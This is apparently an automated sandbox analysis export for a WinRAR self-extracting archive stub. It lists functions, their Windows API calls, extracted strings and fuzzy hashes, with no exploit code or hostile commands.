Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 246dda1923c1355a347fe335355d306b7b3b772ec36e66d0a4a8f0bcada87245
Instruction ID: e315af2aec04ab707259edea7af12ad58eae6fe3d90eb595db5020bb5251205d
Opcode Fuzzy Hash: 246dda1923c1355a347fe335355d306b7b3b772ec36e66d0a4a8f0bcada87245
Instruction Fuzzy Hash: 0F318F79600312AFD711AF61EC88D6BBBBBEF86750B04551AF80582761EB31DD44CEA1

Function 0069A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0069A592,000000FF,?,?), ref: 0069A6C4

Part of subcall function 0069BB03: _wcslen.LIBCMT ref: 0069BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0069A592,000000FF,?,?), ref: 0069A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0069A592,000000FF,?,?), ref: 0069A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0069A592,000000FF,?,?), ref: 0069A728
GetLastError.KERNEL32(?,?,?,?,0069A592,000000FF,?,?), ref: 0069A734

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: aa5cf45211ff2071e12b3f419ca285b72465496714b713b774d97611698dd785
Instruction ID: 1f2b30c35a7ee178d47f49a2118be920869acf180adadfbaa98e21a6c11ea269
Opcode Fuzzy Hash: aa5cf45211ff2071e12b3f419ca285b72465496714b713b774d97611698dd785
Instruction Fuzzy Hash: F9419176900115ABCB25DFA4CC85AE9B7FEFB49350F14419AE95DE7200D734AE90CF90

Function 006B7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,006B7DC4,00000000,006CC300,0000000C,006B7F1B,00000000,00000002,00000000), ref: 006B7E0F
TerminateProcess.KERNEL32(00000000,?,006B7DC4,00000000,006CC300,0000000C,006B7F1B,00000000,00000002,00000000), ref: 006B7E16
ExitProcess.KERNEL32 ref: 006B7E28

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ee2ae4efa7518a7fd465fb0060ca9998a86d720d3bc3741130a6e7d696d0590b
Instruction ID: 32c8288b10f94dc1579047497d401dca4214a49e83e7cf1460f3e32c6ae99e59
Opcode Fuzzy Hash: ee2ae4efa7518a7fd465fb0060ca9998a86d720d3bc3741130a6e7d696d0590b
Instruction Fuzzy Hash: BCE04672100258AFCF017F21CD09EEA3F6BEF80341B008458F8098A632CB36DE92CB84

Function 0069848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00698493

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9c68d93136eebcf285b8fa6dd9de40bef960f719ebe663473199843454c60049
Instruction ID: b3f8c7554179261854c675a854413210c9eb61423700e5eab1a0c8c6dd2d765f
Opcode Fuzzy Hash: 9c68d93136eebcf285b8fa6dd9de40bef960f719ebe663473199843454c60049
Instruction Fuzzy Hash: 5D82E971904245AEDF15DF64C895BFABBBFAF06300F0841BDE8499B742DB315A89CB60

Function 006AB7E0 Relevance: 107.5, APIs: 48, Strings: 13, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006AB7E5

Part of subcall function 00691316: GetDlgItem.USER32(00000000,00003021), ref: 0069135A
Part of subcall function 00691316: SetWindowTextW.USER32(00000000,006C35F4), ref: 00691370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 006AB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006AB8EF
IsDialogMessageW.USER32(?,?), ref: 006AB902
TranslateMessage.USER32(?), ref: 006AB910
DispatchMessageW.USER32(?), ref: 006AB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 006AB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 006AB960
GetDlgItem.USER32(?,00000068), ref: 006AB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 006AB99E
SendMessageW.USER32(00000000,000000C2,00000000,006C35F4), ref: 006AB9B1

Part of subcall function 006AD453: _wcschr.LIBVCRUNTIME ref: 006AD45C
Part of subcall function 006AD453: _wcslen.LIBCMT ref: 006AD47D

SetFocus.USER32(00000000), ref: 006AB9B8
_swprintf.LIBCMT ref: 006ABA24

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

Part of subcall function 006AD4D4: GetDlgItem.USER32(00000068,006EFCB8), ref: 006AD4E8
Part of subcall function 006AD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,006AAF07,00000001,?,?,006AB7B9,006C506C,006EFCB8,006EFCB8,00001000,00000000,00000000), ref: 006AD510
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 006AD51B
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,006C35F4), ref: 006AD529
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 006AD53F
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 006AD559
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 006AD59D
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 006AD5AB
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 006AD5BA
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 006AD5E1
Part of subcall function 006AD4D4: SendMessageW.USER32(00000000,000000C2,00000000,006C43F4), ref: 006AD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 006ABA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 006ABA90
GetTickCount.KERNEL32 ref: 006ABAAE
_swprintf.LIBCMT ref: 006ABAC2
GetLastError.KERNEL32(?,00000011), ref: 006ABAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 006ABB43
_swprintf.LIBCMT ref: 006ABB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 006ABBD0
GetCommandLineW.KERNEL32 ref: 006ABBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 006ABC47
ShellExecuteExW.SHELL32(0000003C), ref: 006ABC6F
Sleep.KERNEL32(00000064), ref: 006ABCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 006ABCE2
CloseHandle.KERNEL32(00000000), ref: 006ABCEB
_swprintf.LIBCMT ref: 006ABD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 006ABD7D
SetDlgItemTextW.USER32(?,00000065,006C35F4), ref: 006ABD94
GetDlgItem.USER32(?,00000065), ref: 006ABD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 006ABDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006ABDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 006ABE68
_wcslen.LIBCMT ref: 006ABEBE
_swprintf.LIBCMT ref: 006ABEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 006ABF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 006ABF4C
GetDlgItem.USER32(?,00000068), ref: 006ABF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 006ABF6B
GetDlgItem.USER32(?,00000066), ref: 006ABF85
SetWindowTextW.USER32(00000000,006DA472), ref: 006ABFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 006AC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 006AC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 006AC0BD
EnableWindow.USER32(00000000,00000000), ref: 006AC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 006AC1D9

Part of subcall function 006AC73F: __EH_prolog.LIBCMT ref: 006AC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 006AC1FD

Strings

__tmp_rar_sfx_access_check_%u, xrefs: 006ABAB5
hj, xrefs: 006ABCA5
^j, xrefs: 006AC1E1
@, xrefs: 006ABB91
"%s"%s, xrefs: 006ABD0D
winrarsfxmappingfile.tmp, xrefs: 006ABBA6
%s, xrefs: 006ABED8
LICENSEDLG, xrefs: 006AC0B2
Ql, xrefs: 006ABBBC
STARTDLG, xrefs: 006AB801
C:\Users\user\Desktop, xrefs: 006ABBC9
<, xrefs: 006ABB84
-el -s2 "-d%s" "-sp%s", xrefs: 006ABB6B

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^j$__tmp_rar_sfx_access_check_%u$hj$winrarsfxmappingfile.tmp$Ql
API String ID: 3829768659-1314319639
Opcode ID: 62cd67587a674c8f0e12ff94b7ac4b2fdb6ad961bc817a2ed7dd54df98091079
Instruction ID: d363acc5864d19772b34650553c416572f80f43e2fc7445b17459be8dd384b07
Opcode Fuzzy Hash: 62cd67587a674c8f0e12ff94b7ac4b2fdb6ad961bc817a2ed7dd54df98091079
Instruction Fuzzy Hash: 5642E071D44254BEEB21BBA09C4AFBE3BAFAB03700F14105AF641A62D2CB755E44CF65

Function 006A0863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 006A087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 006A088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 006A08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 006A0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006A0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006A0B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<l,00000000), ref: 006A0BB1
CloseHandle.KERNEL32(00000000), ref: 006A0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 006A0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<l,?,00000000,?,00000800), ref: 006A0C72
GetFileAttributesW.KERNELBASE(?,?,|<l,00000800,?,00000000,?,00000800), ref: 006A0C9C
GetFileAttributesW.KERNEL32(?,?,D=l,00000800), ref: 006A0CD8

Part of subcall function 006A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006A0836
Part of subcall function 006A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0069F2D8,Crypt32.dll,00000000,0069F35C,?,?,0069F33E,?,?,?), ref: 006A0858

_swprintf.LIBCMT ref: 006A0D4A
_swprintf.LIBCMT ref: 006A0D96

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

AllocConsole.KERNEL32 ref: 006A0D9E
GetCurrentProcessId.KERNEL32 ref: 006A0DA8
AttachConsole.KERNEL32(00000000), ref: 006A0DAF
_wcslen.LIBCMT ref: 006A0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 006A0DD5
WriteConsoleW.KERNEL32(00000000), ref: 006A0DDC
Sleep.KERNEL32(00002710), ref: 006A0DE7
FreeConsole.KERNEL32 ref: 006A0DED
ExitProcess.KERNEL32 ref: 006A0DF5

Strings

`@l, xrefs: 006A0A6C
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 006A0D84
>l, xrefs: 006A09C7
|@l, xrefs: 006A0A77
h=l, xrefs: 006A0947
T=l, xrefs: 006A093F
HAl, xrefs: 006A0ADA
kernel32, xrefs: 006A0873
8>l, xrefs: 006A098F
SetDllDirectoryW, xrefs: 006A0888
0?l, xrefs: 006A09E8
dwmapi.dll, xrefs: 006A0927, 006A0D0D
Al, xrefs: 006A0B1C
dAl, xrefs: 006A0AE5
?l, xrefs: 006A0A35
0Al, xrefs: 006A0ACF
|<l, xrefs: 006A0B9E, 006A0BA2
,<l, xrefs: 006A08E7
|?l, xrefs: 006A0A09
uxtheme.dll, xrefs: 006A0D17
H@l, xrefs: 006A0A61
SetDefaultDllDirectories, xrefs: 006A08B9
D=l, xrefs: 006A0CB9, 006A0CC9
4Bl, xrefs: 006A0B3D
P>l, xrefs: 006A0997
DXGIDebug.dll, xrefs: 006A08FC, 006A0C5E
d?l, xrefs: 006A09FE
@l, xrefs: 006A0AAE
H?l, xrefs: 006A09F3
(=l, xrefs: 006A092F
h>l, xrefs: 006A099F
,@l, xrefs: 006A0A56
<l, xrefs: 006A0917

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: (=l$,<l$,@l$0?l$0Al$4Bl$8>l$D=l$DXGIDebug.dll$H?l$H@l$HAl$P>l$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=l$`@l$d?l$dAl$dwmapi.dll$h=l$h>l$kernel32$uxtheme.dll$|<l$|?l$|@l$<l$>l$?l$@l$Al
API String ID: 1207345701-997159333
Opcode ID: 5c92ff04a81b650846ae0783c7da519b1525fb703e9c38652f3267ad6d0c0070
Instruction ID: fb7f2f4e7f89458e816a6b7132f29b0f44ef9075446e0584d3d708ae3a0a35d5
Opcode Fuzzy Hash: 5c92ff04a81b650846ae0783c7da519b1525fb703e9c38652f3267ad6d0c0070
Instruction Fuzzy Hash: 08D150B1108394ABD720EF508849FEFBAEAEF85704F50891DF18996350CB759A48CF66

Function 006AC73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 006AC744

Part of subcall function 006AB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 006AB3FB

Part of subcall function 006AAF98: _wcschr.LIBVCRUNTIME ref: 006AB033

_wcslen.LIBCMT ref: 006ACA0A
_wcslen.LIBCMT ref: 006ACA13
SetWindowTextW.USER32(?,?), ref: 006ACA71
_wcslen.LIBCMT ref: 006ACAB3
_wcsrchr.LIBVCRUNTIME ref: 006ACBFB
GetDlgItem.USER32(?,00000066), ref: 006ACC36
SetWindowTextW.USER32(00000000,?), ref: 006ACC46
SendMessageW.USER32(00000000,00000143,00000000,006DA472), ref: 006ACC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006ACC7F

Strings

%s.%d.tmp, xrefs: 006AC940
ProgramFilesDir, xrefs: 006ACB45
j, xrefs: 006ACB24
<br>, xrefs: 006AC9D4
<j, xrefs: 006AC909
Software\Microsoft\Windows\CurrentVersion, xrefs: 006ACB1A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$<j$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$j
API String ID: 986293930-3738805957
Opcode ID: 1a1555a4e69cbf7c958f7c7a80c3861c9265774f16a78c6f6dc1bf3377205285
Instruction ID: 959a537295e144dd04b23fe5ec0b5e1bdd47bc7bee203b07d3973444faa653dc
Opcode Fuzzy Hash: 1a1555a4e69cbf7c958f7c7a80c3861c9265774f16a78c6f6dc1bf3377205285
Instruction Fuzzy Hash: F1E167B2900168AADF24EBA4DD45DEE73BEAF06310F1044AAF546E7140EF749E858F64

Function 0069DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0069DA70
_wcschr.LIBVCRUNTIME ref: 0069DA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0069DAAC

Part of subcall function 0069C29A: _wcslen.LIBCMT ref: 0069C2A2

Part of subcall function 006A05DA: _wcslen.LIBCMT ref: 006A05E0

Part of subcall function 006A1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0069BAE9,00000000,?,?,?,000103E4), ref: 006A1BA0

_wcslen.LIBCMT ref: 0069DDE9
__fprintf_l.LIBCMT ref: 0069DF1C

Strings

RTL, xrefs: 0069DEDE
9l, xrefs: 0069DDD0
,, xrefs: 0069DF57
a, xrefs: 0069DC16
$%s:, xrefs: 0069DEFF
R, xrefs: 0069DC0C
*messages***, xrefs: 0069DBC1
*messages***, xrefs: 0069DBFA
@%s:, xrefs: 0069DF06, 0069DF12
, xrefs: 0069DD6C

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9l
API String ID: 557298264-4171055461
Opcode ID: 33e8c7f2821ccbecacfe1b6acd55892dc855b220d437fb123afb76adfb806053
Instruction ID: 7248cdb27d3fa3eed16f49fa8de59bd699a89d5aa8c31981c3b751bec88b83ea
Opcode Fuzzy Hash: 33e8c7f2821ccbecacfe1b6acd55892dc855b220d437fb123afb76adfb806053
Instruction Fuzzy Hash: 0332CE71900218EBCF24EF68C841BEA77AAFF19700F40416EF9059B691EBB2DD85CB54

Function 006AD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006AB579
Part of subcall function 006AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006AB58A
Part of subcall function 006AB568: IsDialogMessageW.USER32(000103E4,?), ref: 006AB59E
Part of subcall function 006AB568: TranslateMessage.USER32(?), ref: 006AB5AC
Part of subcall function 006AB568: DispatchMessageW.USER32(?), ref: 006AB5B6

GetDlgItem.USER32(00000068,006EFCB8), ref: 006AD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,006AAF07,00000001,?,?,006AB7B9,006C506C,006EFCB8,006EFCB8,00001000,00000000,00000000), ref: 006AD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 006AD51B
SendMessageW.USER32(00000000,000000C2,00000000,006C35F4), ref: 006AD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 006AD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 006AD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 006AD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 006AD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 006AD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 006AD5E1
SendMessageW.USER32(00000000,000000C2,00000000,006C43F4), ref: 006AD5F0

Strings

\, xrefs: 006AD549

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 191a60f7d6972cedb47680acf49d07106d22f65c6c1b13ed2e31dd36527361ac
Instruction ID: a7b831ab688d2cc932671276cd1fdce028f8e335d4fa2502030da6adee8567e2
Opcode Fuzzy Hash: 191a60f7d6972cedb47680acf49d07106d22f65c6c1b13ed2e31dd36527361ac
Instruction Fuzzy Hash: B631D471545352BFE301EF20EC4AFBB7FAEEB86704F00050AF55196291DB659A04CBBA

Function 006AD78F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 006AD7AE
ShellExecuteExW.SHELL32(?), ref: 006AD8DE
ShowWindow.USER32(?,00000000), ref: 006AD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 006AD959
CloseHandle.KERNEL32(?), ref: 006AD97F
ShowWindow.USER32(?,00000001), ref: 006AD9E1

Strings

.exe, xrefs: 006AD989
hj, xrefs: 006AD92E
.inf, xrefs: 006AD89A
rj, xrefs: 006AD911

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf$hj$rj
API String ID: 36480843-2781189704
Opcode ID: bdb905763b4a15072abd3a01cfed50279fa165c9c194f445756d99f3846cd8f9
Instruction ID: 83d92fa35c02b8e9c59a55b01bef32e82d06af384b2fbada7c291b1fed2e4652
Opcode Fuzzy Hash: bdb905763b4a15072abd3a01cfed50279fa165c9c194f445756d99f3846cd8f9
Instruction Fuzzy Hash: 8451AE70504380AAEB20AB249844BEBBBE7AB43744F04141EF5C697691EB75DD85CF52

Function 006BA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006B5695,006B5695,?,?,?,006BABAC,00000001,00000001,2DE85006), ref: 006BA9B5
